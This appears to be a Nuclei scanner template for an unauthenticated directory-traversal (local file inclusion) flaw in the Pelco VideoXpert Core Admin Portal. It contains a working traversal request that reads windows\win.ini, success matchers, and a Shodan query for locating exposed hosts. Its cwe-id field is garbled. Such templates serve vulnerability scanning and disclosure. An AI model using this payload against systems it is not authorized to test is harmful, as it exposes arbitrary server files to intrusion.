40 lines
1.4 KiB
YAML
40 lines
1.4 KiB
YAML
id: videoxpert-lfi
|
|
|
|
info:
|
|
name: Schneider Electric Pelco VideoXpert Core Admin Portal - Local File Inclusion
|
|
author: 0x_akoko
|
|
severity: high
|
|
description: Schneider Electric Pelco VideoXpert Core Admin Portal suffers from local file inclusion. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html
|
|
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22Directory-Traversal.html
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: title:"VideoXpert"
|
|
tags: schneider,pelco,packetstorm,lfi,videoxpert
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'bit app support'
|
|
- 'fonts'
|
|
- 'extensions'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a0046304402203216377d842f5674d546daea27a242aa678ba12656b7a9080f76071adbb5d9a5022063815ab18c5c589bd4d55bb61b6dc1598392d2e60b33c0f7b0851feac3245542:922c64590222798bb761d5b6d8e72950
|